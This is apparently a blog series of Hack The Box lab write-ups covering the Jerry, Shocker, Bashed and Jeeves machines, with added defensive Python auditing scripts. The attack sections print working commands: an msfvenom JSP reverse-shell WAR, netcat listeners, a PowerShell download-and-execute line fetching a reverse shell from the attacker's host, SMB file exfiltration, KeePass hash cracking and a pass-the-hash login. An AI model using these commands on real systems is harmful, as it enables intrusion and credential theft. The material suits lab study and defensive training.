Jerry – No Metasploit

Yeah… that’s definitely not the Jerry I remember from Tom and Jerry. Anyway, let’s get started with our usual portscan:

PORT     STATE SERVICE REASON          VERSION
8080/tcp open  http    syn-ack ttl 127 Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2012 (90%)
OS CPE: cpe:/o:microsoft
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Microsoft Windows Server 2012 (90%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (90%), ...
No exact OS matches for host (test conditions non-ideal).

Okay. Let’s look at some other enumeration scans, namely gobuster on port 8080 and nikto:

kali@hyd3:~/Tools/AutoRecon/results/10.10.10.95/scans$ cat tcp_8080_http_gobuster.txt
/aux (Status: 200) [Size: 0]
/com1 (Status: 200) [Size: 0]
/com4 (Status: 200) [Size: 0]
/com2 (Status: 200) [Size: 0]
/com3 (Status: 200) [Size: 0]
/con (Status: 200) [Size: 0]
/docs (Status: 302) [Size: 0]
/examples (Status: 302) [Size: 0]
/favicon.ico (Status: 200) [Size: 21630]
/host-manager (Status: 302) [Size: 0]
/index.jsp (Status: 200) [Size: 11398]
/manager (Status: 302) [Size: 0]
/nul (Status: 200) [Size: 0]
kali@hyd3:~/Tools/AutoRecon/results/10.10.10.95/scans$ cat tcp_8080_http_nikto.txt
- Nikto v2.1.6
Target IP:          10.10.10.95
Target Hostname:    10.10.10.95
Target Port:        8080
Start Time:         2020-05-28 14:11:59 (GMT-4)
Server: Apache-Coyote/1.1
The anti-clickjacking X-Frame-Options header is not present.
The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
No CGI Directories found (use '-C all' to force check all possible dirs)
OSVDB-39272: /favicon.ico file identifies this app/server as: Apache Tomcat (possibly 5.5.26 through 8.0.15), Alfresco Community
Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS
OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.

Hmm. Ok interesting… So we can use PUT and place a malicious file on the server…? But let’s see if there’s another way to get into this box:

Ooh Apache Tomcat! Pretty familiar with this. Using default creds: tomcat and s3cret, we get in.

Scrolling down, we see we can upload a .war file.

[Tomcat Manager "Deploy" section: "Deploy directory or WAR file located on server" (Context Path (required), XML Configuration file URL, WAR or Directory URL) and "WAR file to deploy" with a "Select WAR file to upload" browse button]
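The whole chain here rests on the Manager app answering to credentials lifted from the Tomcat documentation. As an added example (not part of the original write-up or Tomcat's own code), this audit parses a tomcat-users.xml and flags privileged accounts that use such example passwords, short passwords, or the manager-gui plus manager-script combination the Manager HOW-TO warns against; SAMPLE_XML is constructed.

```python
"""Audit a Tomcat tomcat-users.xml for Manager / Host Manager accounts that
still use documentation-example credentials or combine roles the Tomcat docs
say to keep apart.

Added example for this write-up, not code from the box or from Tomcat.
SAMPLE_XML is constructed; KNOWN_EXAMPLE_CREDS holds the pair that opened this
box (tomcat / s3cret, straight from the Manager HOW-TO) plus the pairs in the
commented-out block Tomcat ships in tomcat-users.xml (assumption: illustrative,
not exhaustive)."""
import xml.etree.ElementTree as ET

# Roles that give deploy or host-level control through the web applications.
PRIVILEGED_ROLES = {"manager-gui", "manager-script", "manager-jmx",
                    "manager-status", "admin-gui", "admin-script"}

KNOWN_EXAMPLE_CREDS = {("tomcat", "s3cret"), ("tomcat", "tomcat"),
                       ("both", "tomcat"), ("role1", "tomcat"),
                       ("admin", "admin")}

MIN_PASSWORD_LEN = 12  # assumption: local policy value for privileged accounts

SAMPLE_XML = """<tomcat-users xmlns="http://tomcat.apache.org/xml">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <role rolename="manager-status"/>
  <user username="tomcat" password="s3cret" roles="manager-gui,manager-script"/>
  <user username="deployer" password="a1b2c3d4e5f60718293a4b5c6d7e8f9012345678"
        roles="manager-script"/>
  <user username="viewer" password="viewonly" roles="manager-status"/>
  <user username="alice" password="alice-pw" roles="tomcat"/>
</tomcat-users>
"""


def _local(tag):
    """Strip the XML namespace so the parser works with or without xmlns."""
    return tag.rsplit("}", 1)[-1]


def audit_tomcat_users(xml_text):
    """Return (username, reason) findings for privileged accounts."""
    findings = []
    for el in ET.fromstring(xml_text).iter():
        if _local(el.tag) != "user":
            continue
        user = el.get("username", "")
        password = el.get("password", "")
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        privileged = roles & PRIVILEGED_ROLES
        if not privileged:
            continue
        if (user, password) in KNOWN_EXAMPLE_CREDS:
            findings.append((user, "known example credential with roles "
                             + ",".join(sorted(privileged))))
        elif len(password) < MIN_PASSWORD_LEN:
            findings.append((user, "short password on a privileged account"))
        if "manager-gui" in roles and roles & {"manager-script", "manager-jmx"}:
            # The Manager HOW-TO warns against this mix: the HTML interface is
            # CSRF-protected, the script and JMX interfaces are not, and one
            # session reaches both.
            findings.append((user, "manager-gui combined with manager-script/jmx"))
    return findings


if __name__ == "__main__":
    for user, reason in audit_tomcat_users(SAMPLE_XML):
        print("%-10s %s" % (user, reason))
```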

Too easy. We can generate a war file with msfvenom to get a reverse shell:

kali@hyd3:~/Documents/htb/jerry$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.30 LPORT=4444 -f war > hyd3.war
Payload size: 1089 bytes
Final size of war file: 1089 bytes

Clicking the link navigates us to our WAR file, which triggers the reverse shell:

kali@hyd3:~/Documents/htb/jerry$ rlwrap nc -nvlp
listening on [any] ...
connect to [10.10.14.30] from (UNKNOWN) [10.10.10.95] 49192
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

whoami
nt authority\system
hostname
JERRY

NT AUTHORITY\SYSTEM shell! A bit anti-climactic but oh well. Getting the flags, we see that this was the intended way because we have “2 for the price of 1.txt” for the flags:

Shocker – No Metasploit

Cool… let’s get started with a portscan and basic gobuster enumeration:

Okay. Let’s have a look at the website:

Hm. Seemingly useless dead end.

I thought I was missing something. No matter how much I try to enumerate, I come up short with nothing:

Then after doing A LOT of research, I found out that cgi-bin stores scripts in other languages such as python, js, bash, php, etc.

Let me try fuzzing that with those specific extensions:

Finally a hit. user.sh

Googling for cgi-bin and sh web exploits, Shellshock came up… I looked into it more and knew I had to put a special Shellshock string into the User-Agent field to exploit the vulnerability, followed by the command.
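From the other side of the fence, the same request is easy to pick out of an Apache access log. The following detector is an added example for this write-up (not anything from the box): it parses combined-format log lines, looks for the Bash function-definition prefix in the User-Agent, Referer and request fields, and records which CGI script was targeted; the log lines are constructed and the hostile ones carry a harmless marker command.

```python
"""Flag Shellshock-style probes (the CVE-2014-6271 family) in Apache
combined-format access logs: a Bash function definition smuggled into a
request header, aimed at a CGI script such as the user.sh found above.

Added example for this write-up, not something from the box. The log lines
are constructed; the hostile ones carry a harmless marker command so the
detector has something to match."""
import re
from collections import Counter

# ip ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$')

# The trigger is "() {" at the start of a header value (whitespace varies).
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')
CGI_PATH_RE = re.compile(r'^\S+\s+(/cgi-bin/\S*)')

SAMPLE_LOG = """\
10.10.14.30 - - [27/May/2020:16:10:01 -0400] "GET / HTTP/1.1" 200 137 "-" "Mozilla/5.0 (X11; Linux x86_64)"
10.10.14.30 - - [27/May/2020:16:12:45 -0400] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "curl/7.68.0"
10.10.14.30 - - [27/May/2020:16:13:02 -0400] "GET /cgi-bin/user.sh HTTP/1.1" 500 0 "-" "() { :; }; echo shellshock-test"
10.10.14.31 - - [27/May/2020:16:13:09 -0400] "GET /index.html HTTP/1.1" 200 137 "() {:;}; /bin/true" "Mozilla/5.0"
"""


def classify(line):
    """Return a finding for a Shellshock-looking line, else None."""
    m = LOG_RE.match(line.rstrip("\n"))
    if not m:
        return None
    f = m.groupdict()
    hit_fields = [name for name in ("agent", "referer", "request")
                  if SHELLSHOCK_RE.search(f[name])]
    if not hit_fields:
        return None
    cgi = CGI_PATH_RE.match(f["request"])
    return {"ip": f["ip"], "time": f["time"], "fields": hit_fields,
            "cgi_script": cgi.group(1) if cgi else None,
            # A 500 on a CGI script often means the injected body ran and
            # the script then emitted no valid headers.
            "status": f["status"]}


def scan(lines):
    return [hit for hit in map(classify, lines) if hit]


def sources(findings):
    """Count probes per source address, handy for blocking or triage."""
    return Counter(hit["ip"] for hit in findings)


if __name__ == "__main__":
    hits = scan(SAMPLE_LOG.splitlines())
    for hit in hits:
        print(hit)
    print(dict(sources(hits)))
```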

And we get a callback on our listener:

Note: Usually I would have tested the above exploit with a ping first, but at this point I was extremely frustrated and just wanted to go for it.

Grabbing the user flag:

Okay. Now on to priv esc. I always like to do sudo -l as one of the first enumeration commands:

duh. So I can run any perl command as root. This should be pretty obvious but from here, all you need to do is sudo /usr/bin/perl and then either use pentestmonkey’s perl reverse shell one-liner and you’ll get a root shell OR just use perl syntax to switch to the root user. Leaving this open-ended for you to figure out the rest!

Bashed – No Metasploit

Let’s start off with our portscan:

Looks like only port 80 is open. Running gobuster on port 80, we get some interesting directories:

After going down the list, we see /dev’s contents:

What’s phpbash.php ?

It’s an interactive web shell. Well, that’s pretty straightforward. Using this payload from the pentestmonkey website:

We get a reverse shell on our listener:

Grabbing the user.txt flag:

So let’s look around and MANUALLY enumerate before we try to use scripts. Manual enumeration is always preferred because you’re being more intentional on what you’re looking at. And to be honest, scripts can always miss stuff.

Running ps -ef we see that there is a cron job running every minute:

So let’s try to read test.py

Womp womp. Okay… well let’s try to do something that we should have done right away in the first place: sudo -l

So this is interesting. We know that scriptmanager is a user on the box. This took me a little bit, but I eventually got it (of course, syntax error):

So now, I can read test.py. Now that I am scriptmanager, I’m willing to bet that test.py is executed by root. I just need to create my own test.py and replace what’s in there.

Once I put this on the box, I tested it first to make sure it worked … of course I had a few issues prior to getting the script right but that’s why we test first!

Ok so the script works. Time to let the cron run and start our listener and wait patiently for root to execute the script:
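The root cause on this box is a root cron job executing a script that a lower-privileged user owns and can rewrite. As an added example (not from the box), this audit parses /etc/crontab-style entries, works out which file each root entry actually executes, and reports ownership and write-permission problems; it builds its own scratch directory with one world-writable script and one locked-down script so it runs anywhere.

```python
"""Audit system-crontab entries for scripts that run as root but can be
modified by a less privileged user (the Bashed path: root cron running a
test.py that scriptmanager can replace).

Added example for this write-up; it builds a scratch directory with two
scripts to audit, so it runs anywhere. Owner checks compare against uid 0 and
are only informational when the audit itself runs as a normal user."""
import os
import stat
import tempfile

INTERPRETERS = {"python", "python2", "python3", "bash", "sh", "perl", "php"}


def parse_system_crontab(text):
    """Yield (schedule, user, command) for /etc/crontab-style lines."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue                      # blank, comment or VAR=value line
        parts = line.split(None, 6)
        if len(parts) < 7:
            continue
        yield " ".join(parts[:5]), parts[5], parts[6]


def script_path(command):
    """Pick the file the cron command actually executes."""
    tokens = command.split()
    if not tokens:
        return None
    if os.path.basename(tokens[0]) in INTERPRETERS and len(tokens) > 1:
        return tokens[1]                  # "python /path/test.py" -> the script
    return tokens[0]


def check_path(path):
    """Return the reasons a root-run script at `path` is risky."""
    reasons = []
    try:
        st = os.stat(path)
    except OSError:
        return ["does not exist (a writable parent dir would let someone create it)"]
    if st.st_uid != 0:
        reasons.append("owned by uid %d, not root" % st.st_uid)
    if st.st_mode & stat.S_IWGRP:
        reasons.append("group-writable")
    if st.st_mode & stat.S_IWOTH:
        reasons.append("world-writable")
    parent = os.stat(os.path.dirname(path) or ".")
    if parent.st_mode & stat.S_IWOTH and not parent.st_mode & stat.S_ISVTX:
        reasons.append("parent directory world-writable without sticky bit")
    return reasons


def audit(crontab_text):
    findings = []
    for schedule, user, command in parse_system_crontab(crontab_text):
        if user != "root":
            continue
        path = script_path(command)
        if path is None:
            continue
        reasons = check_path(path)
        if reasons:
            findings.append({"schedule": schedule, "path": path, "reasons": reasons})
    return findings


def demo():
    """Constructed scenario: one world-writable script, one locked down."""
    d = tempfile.mkdtemp()
    bad, good = os.path.join(d, "test.py"), os.path.join(d, "backup.sh")
    for p in (bad, good):
        with open(p, "w") as fh:
            fh.write("#!/bin/sh\n")
    os.chmod(d, 0o755)
    os.chmod(bad, 0o777)                  # the Bashed-style mistake
    os.chmod(good, 0o755)
    crontab = "* * * * * root python %s\n*/5 * * * * root %s\n" % (bad, good)
    return {f["path"]: f["reasons"] for f in audit(crontab)}


if __name__ == "__main__":
    for path, reasons in demo().items():
        print(path, "->", "; ".join(reasons))
```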

Jeeves – No Metasploit

Fire up autorecon and run some scans… I did this while I went to http://10.10.10.63. It’s a good habit to just try port 80 while your scans are running so you’re not wasting time.

So when we go to the website and try searching, anything we do results in this:

Server Error in '/' Application.
Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.4053.00 (Intel X86)
May 26 2009 14:24:20
Copyright (c) 1988-2005 Microsoft Corporation
Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
' to data type int.
Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.
Exception Details: System.Data.SqlClient.SqlException: Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.4053.00 (Intel X86) ... Service Pack 4)' to data type int.
Source Error:

But the weird thing is… it’s a fake image. So this is a dead end.

I waited a bit and got my scans back. Let’s look at nmap:

Nmap scan report for 10.10.10.63
Host is up, received user-set (0.044s latency).
Scanned at 2020-05-27 16:17:20 EDT for 192s
Not shown: 65531 filtered ports
Reason: 65531 no-responses
PORT      STATE SERVICE      REASON          VERSION
80/tcp    open  http         syn-ack ttl 127 Microsoft IIS httpd 10.0
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Ask Jeeves
135/tcp   open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
445/tcp   open  microsoft-ds syn-ack ttl 127 Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open  http         syn-ack ttl 127 Jetty 9.4.z-SNAPSHOT
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Error Not Found
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2008 (88%)
OS CPE: cpe:/o:microsoft:windows_server_2008:r2
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Microsoft Windows Server 2008 R2 (88%)
No exact OS matches for host (test conditions non-ideal).

Okay so there’s a port 50000 as well. I like to switch up the enumeration tools so this time I wanted to try using wfuzz. Running wfuzz on port 80 didn’t show anything new. However, on port 50000:

kali@hyd3:~/Tools/AutoRecon/results/10.10.10.63/scans$ wfuzz -c -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hc <value cut off in the screenshot> http://10.10.10.63:50000/FUZZ
Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

* Wfuzz 2.4.5 - The Web Fuzzer *

Target: http://10.10.10.63:50000/FUZZ
Total requests: 220560

ID           Response   Lines    Word     Chars       Payload
000041607:   302        11 L     26 W     318 Ch      "askjeeves"
000048313:   (still running)                          "bt3"

Finishing pending requests...

Alright… Let’s navigate to http://10.10.10.63:50000/askjeeves/

[Jenkins dashboard at /askjeeves/, shown without logging in: New Item, People, Build History, Manage Jenkins and Credentials in the side menu, two idle build executors, and one existing job with recent successes (#10, #1) and a failure (#16)]

Interesting. I tried logging in with default creds and common lists, but nothing worked. I then just started poking around at the site to see what I could do without logging in.

Looks like we can create a project.

[Jenkins "Enter an item name" page, reached while logged out: an item name can be entered (I used "pingme") and the item type chosen: Freestyle project, Pipeline, Multi-configuration project, Folder, GitHub Organization, Multibranch Pipeline]

Now clicking around and scrolling down… we see something very interesting:

[Configuration page for the new "pingme" job: General, Source Code Management, Build Triggers (Build periodically, GitHub hook trigger for GITScm polling, Poll SCM), Build Environment (Delete workspace before build starts, Abort the build if it's stuck, Add timestamps to the Console Output, Use secret text(s) or file(s), With Ant), Build and Post-build Actions. The "Add build step" dropdown offers: Execute Windows batch command, Execute shell, Invoke Ant, Invoke Gradle script, Invoke top-level Maven targets, Run with timeout, Set build status to "pending" on GitHub commit. Footer: Page generated May 28, 2020, Jenkins ver. 2.87]

This looks like a clear path to RCE. Let’s test it out:

[Build step "Execute Windows batch command" with the Command box set to: ping 10.10.14.30]
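What made this possible is an authorization setup that lets anonymous users create and configure jobs, and that is visible in the controller's config.xml. As an added example (not the box's or Jenkins' own code), this audit reads a Jenkins global config.xml and reports the settings that hand anonymous users a build step; the weak, hardened and unsecured fragments are constructed, and the permission identifiers are the ones Jenkins writes for its matrix authorization strategy (assumption: newer versions prefix entries with USER:/GROUP:, which is handled).

```python
"""Flag Jenkins global config.xml settings that let anonymous users create or
configure jobs, which is all it took here to run a batch command on the
controller.

Added example for this write-up. The config fragments are constructed; the
permission identifiers are the ones Jenkins writes for the matrix
authorization strategy (assumption: newer versions prefix each entry with
USER: or GROUP:, handled below)."""
import xml.etree.ElementTree as ET

# Permissions that translate directly into code execution on the controller or agents.
DANGEROUS_FOR_ANONYMOUS = {
    "hudson.model.Hudson.Administer",
    "hudson.model.Hudson.RunScripts",
    "hudson.model.Item.Create",
    "hudson.model.Item.Configure",
    "hudson.model.Item.Build",
}

WEAK_CONFIG = """<hudson>
  <version>2.87</version>
  <useSecurity>true</useSecurity>
  <authorizationStrategy class="hudson.security.GlobalMatrixAuthorizationStrategy">
    <permission>hudson.model.Hudson.Administer:admin</permission>
    <permission>hudson.model.Hudson.Read:anonymous</permission>
    <permission>hudson.model.Item.Create:anonymous</permission>
    <permission>hudson.model.Item.Configure:anonymous</permission>
    <permission>hudson.model.Item.Build:anonymous</permission>
    <permission>hudson.model.Item.Read:anonymous</permission>
  </authorizationStrategy>
</hudson>
"""

HARDENED_CONFIG = """<hudson>
  <useSecurity>true</useSecurity>
  <authorizationStrategy class="hudson.security.GlobalMatrixAuthorizationStrategy">
    <permission>USER:hudson.model.Hudson.Administer:admin</permission>
    <permission>GROUP:hudson.model.Item.Build:developers</permission>
  </authorizationStrategy>
</hudson>
"""

UNSECURED_CONFIG = """<hudson>
  <useSecurity>false</useSecurity>
  <authorizationStrategy class="hudson.security.AuthorizationStrategy$Unsecured"/>
</hudson>
"""


def audit_jenkins_config(xml_text):
    """Return a list of human-readable findings, empty when nothing is wrong."""
    root = ET.fromstring(xml_text)
    findings = []
    if (root.findtext("useSecurity") or "").strip().lower() != "true":
        findings.append("useSecurity is not true: no authentication at all")
    strategy = root.find("authorizationStrategy")
    if strategy is None:
        findings.append("no authorizationStrategy element")
        return findings
    cls = strategy.get("class", "")
    if cls.endswith("AuthorizationStrategy$Unsecured"):
        findings.append("authorizationStrategy is Unsecured: anyone has full control")
    if cls.endswith("FullControlOnceLoggedInAuthorizationStrategy"):
        deny = (strategy.findtext("denyAnonymousReadAccess") or "false").strip().lower()
        if deny != "true":
            findings.append("anonymous read access allowed (denyAnonymousReadAccess is not true)")
    for perm in strategy.findall("permission"):
        parts = (perm.text or "").strip().split(":")
        if len(parts) < 2:
            continue
        sid, perm_id = parts[-1], parts[-2]     # works with and without USER:/GROUP:
        if sid == "anonymous" and perm_id in DANGEROUS_FOR_ANONYMOUS:
            findings.append("anonymous holds %s" % perm_id)
    return findings


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG),
                      ("unsecured", UNSECURED_CONFIG)):
        print(name, audit_jenkins_config(cfg) or ["ok"])
```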

After saving it, I had to figure out how to trigger it. The “build now” button seemed like a good candidate:

[Project page: Build Now, Delete Project, Configure, and a Build History entry dated May 28, 2020 2:26 PM]

Running tcpdump on my box, I see the ICMP requests coming through:

kali@hyd3:~/Tools/AutoRecon/results/10.10.10.63/scans$ sudo tcpdump -i tun0
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on tun0, link-type RAW (Raw IP), capture size 262144 bytes
09:22:24.973560 IP 10.10.10.63.50000 > hyd3.50664: Flags [P.], seq 1:206, ack 662, win 254, options [nop,nop,TS val 40181743 ecr 1480055907], length 205
09:22:24.973596 IP hyd3.50664 > 10.10.10.63.50000: Flags [.], ack 206, win 501, options [nop,nop,TS val 1480055951 ecr 40181743], length 0
09:22:25.043798 IP 10.10.10.63 > hyd3: ICMP echo request, id 1, seq 5
09:22:25.043814 IP hyd3 > 10.10.10.63: ICMP echo reply, id 1, seq 5
09:22:26.061409 IP 10.10.10.63 > hyd3: ICMP echo request, id 1, seq 6
09:22:26.061442 IP hyd3 > 10.10.10.63: ICMP echo reply, id 1, seq 6
09:22:26.312795 IP hyd3.50664 > 10.10.10.63.50000: Flags [P.], seq 662:1331, ack 206, win 501, options [nop,nop,TS val 1480057290 ecr 40181743], length 669
(the TCP traffic is the Jenkins session on port 50000; echo request/reply pairs for seq 7 and 8 follow)

Now it’s as simple as creating a reverse powershell script with Nishang and appending the bottom with a callback to our box:

    catch
    {
        Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port."
        Write-Error $_
    }
}
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.30 -Port ...

Serve up the PowerShell script:

kali@hyd3:~/Documents/htb/jeeves$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.10.63 - - [28/May/2020 09:36:12] "GET /Invoke-PowerShellTcp.ps1 HTTP/1.1" 200 -

Modify the build request:

[Build step "Execute Windows batch command", Command box:]
IEX(New-Object Net.WebClient).downloadString('http://10.10.14.30:8000/Invoke-PowerShellTcp.ps1')

Once you trigger it, you should receive a callback on your listener:

kali@hyd3:~/Documents/htb/jeeves$ rlwrap nc -nvlp
listening on [any] ...
connect to [10.10.14.30] from (UNKNOWN) [10.10.10.63] 49688
Windows PowerShell running as user kohsuke on JEEVES
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\...> whoami
jeeves\kohsuke
PS C:\...> hostname
Jeeves

As a force of habit, I uploaded nc.exe and used it to get a binary shell as well.

Some simple enumeration showed an interesting file: CEH.kdbx

    Directory of C:\...

05/28/2020  02:42 PM    <DIR>          .
05/28/2020  02:42 PM    <DIR>          ..
09/18/2017  01:43 PM             2,846 CEH.kdbx

I tried copying the file with nc.exe but it was way too slow (if at all). I ended up using SMB:

kali@hyd3:~/Documents/htb/jeeves/smb$ sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py hyd3 /home/kali/Documents/htb/jeeves/smb
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

Create the folder on the victim box and navigate to it:

PS C:\...> New-PSDrive -Name "hyd3" -PSProvider "FileSystem" -Root "\\10.10.14.30\hyd3"

Name   Used (GB)   Free (GB)   Provider     Root                  CurrentLocation
----   ---------   ---------   --------     ----                  ---------------
hyd3                           FileSystem   \\10.10.14.30\hyd3

Copy the file over.

Now looking at the file and running file on it, you know it’s a KeePass database. Crack it with hashcat. In order to do this, first you need to extract the hash with keepass2john:

kali@hyd3:~/Documents/htb/jeeves/smb$ /usr/sbin/keepass2john CEH.kdbx > ceh.hash
kali@hyd3:~/Documents/htb/jeeves/smb$ cat ceh.hash
CEH:
3766b61e656351C3acaØ282f1617511Ø31fØ156Ø89b6C5647de4671972fcff*Cb4Ø9dbCØfr66ØfCffr4f1CC89f728b
68254db431a21ec33298b612fe647db48
kali@hyd3:~/Documents/htb/jeeves/smb$ vi ceh.hash

Locate the mode (-m) for hashcat for this hash format:

Hashcat is not expecting the CEH: file name before the hash, so edit that and then run hashcat with rockyou.txt

kali@hyd3:~/Documents/htb/jeeves/smb$ vi ceh.hash
kali@hyd3:~/Documents/htb/jeeves/smb$ cat ceh.hash
b61e656351C3acaØ282f1617511Ø31fØ156Ø89b6C5647de4671972fCff*Cb4Ø9dbCØfr66ØfCffr4f1CC89f728b6825
4db431a21ec33298b612fe647db48
kali@hyd3:~/Documents/htb/jeeves/smb$ hashcat -m 13400 -w 1 /usr/share/wordlists/rockyou.txt ceh.hash
hashcat (v5.1.0) starting...

OpenCL Platform #1: The pocl project
* Device #1: pthread-AMD Ryzen 7 2700 Eight-Core Processor, 1024/2272 MB allocatable, 4MCU

Counted lines in /usr/share/wordlists/rockyou.txt... Insufficient memory available
Insufficient memory available
Segmentation fault

Whoops… This happened because I swapped the wordlist and the actual hash… so hashcat thought it was cracking a much larger file.

kali@hyd3:~/Documents/htb/jeeves/smb$ hashcat -m 13400 -a ceh.hash /usr/share/wordlists/rockyou.txt
hashcat (v5.1.0) starting...

OpenCL Platform #1: The pocl project
* Device #1: pthread-AMD Ryzen 7 2700 Eight-Core Processor, 1024/2272 MB allocatable, 4MCU

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Single-Hash
* Single-Salt

Minimum password length supported by kernel:
Maximum password length supported by kernel: 256

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

* Device #1: build_opts '-cl-std=CL1.2 -I OpenCL -I /usr/share/hashcat/OpenCL ... -D KERN_TYPE=13400 -D _unroll'
* Device #1: Kernel m13400-pure.ce8862df.kernel not found in cache! Building may take a while...

b61e656351C3acaØ282f1617511Ø31fØ156Ø89b6C5647de4671972fCff*Cb4Ø9dbCØft66ØfCfft4f1CC89f728b6825
4db431a21ec33298b612fe647db48:moonshine1

Session..........: hashcat
Status...........: Cracked
Hash.Type........: KeePass 1 (AES/Twofish) and KeePass 2 (AES)
Hash.Target......: ...47db48
Time.Started.....: Thu May 28 2020 (31 secs)
Time.Estimated...: Thu May 28 2020 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1760 H/s (12.21ms) @ Accel:512 Loops:64 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 55296/14344385 (0.39%)
Rejected.........: 0/55296 (0.00%)
Restore.Point....: 53248/14344385 (0.37%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:5952-6000
Candidates.#1....: soydivina -> grad2010

Started: Thu May 28 2020
Stopped: Thu May 28 2020

So we found that the password for the file is moonshine1

Looking through everything in the kdbx file, we find:

[KeePassX showing CEH.kdbx (read-only). Groups: General, Windows, Network, Internet, eMail, Homebanking. Entries: Backup stuff; Bank of America (Michael321); DC Recovery PW (administrator); EC-Council (hackerman123); It's a secret (admin); Jenkins admin (admin); Keys to the king... (bob); Walmart.com (anonymous). URLs listed: https://www.bankofamerica.com, https://www.eccouncil.org/progra..., http://localhost:8180/secret.jsp, http://localhost:8080, http://www.walmart.com]

Taking note of all the credentials found:

backupstuff: aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00
Michael321: 12345
administrator: SITjAtJHKsugh90C4VZ1
hackerman123: pwndyouall!
admin: F7WhTrSFDKB6sxHU1cun
bob: ICEUnYPjNf1uPZSzOySA
anonymous: password

So I tried using smbexec with either of the administrator passwords with no luck… but I knew that the first line is an NTLM hash, so I attempted to pass the hash… and got a SYSTEM-level shell back.

kali@hyd3:~/Documents/htb/jeeves/smb$ pth-winexe -U administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 //10.10.10.63 cmd.exe
E_md4hash wrapper called.
HASH PASS: Substituting user supplied NTLM HASH...
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.

C:\Windows>whoami
jeeves\administrator

C:\Windows>hostname
Jeeves

Grabbing the user and root flags:

C:\Users>cd Administrator
C:\Users\Administrator>cd Desktop
C:\Users\Administrator\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is BE50-B1C9

 Directory of C:\Users\Administrator\Desktop

11/08/2017  10:05 AM    <DIR>          .
11/08/2017  10:05 AM    <DIR>          ..
12/24/2017  03:51 AM                36 hm.txt
11/08/2017  10:05 AM               797 Windows 10 Update Assistant.lnk
               2 File(s)            833 bytes
               2 Dir(s)   7,... bytes free

C:\Users\Administrator\Desktop>type hm.txt
The flag is elsewhere.
Look deeper.

What? Deeper?

Ok, maybe an alternate data stream… I found an online tutorial using streams.exe but it didn’t want to work for me, so I found a PowerShell alternative:

Optimum – No Metasploit

Let’s power up nmap and see what we find:

PORT   STATE SERVICE REASON          VERSION
80/tcp open  http    syn-ack ttl 127 HttpFileServer httpd 2.3
|_http-favicon: Unknown favicon MD5: 759792EDD4EF8E6BC2D1877D27153CB1
| http-methods:
|_  Supported Methods: GET HEAD POST
|_http-server-header: HFS 2.3
